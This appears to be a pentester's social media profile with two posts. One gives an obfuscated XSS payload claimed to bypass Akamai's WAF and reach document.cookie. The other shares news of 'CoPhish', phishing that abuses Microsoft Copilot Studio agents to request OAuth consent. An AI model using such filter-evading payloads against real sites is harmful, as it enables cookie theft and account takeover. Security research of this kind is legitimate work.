Javier Olmedo
@jjavierolmedo
👨💻 OSCP - OSWE | Pentester - Author hackpuntes.com blog
ID: 593075308
https://github.com/JavierOlmedo 28-05-2012 21:18:03
6,6K Tweet
1,1K Followers
1,1K Following
Cross Site Scripting (XSS) Akamai WAF Bypass try this payload : <!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27> Credit: NullSecurityX #BugBounty #XSS #bugbountytips #infosec
A new phishing technique dubbed 'CoPhish' weaponizes Microsoft Copilot Studio agents to deliver fraudulent OAuth consent requests via legitimate and trusted Microsoft domains. Microsoft told BleepingComputer they plan on fixing it in a future update. bleepingcomputer.com/news/security/…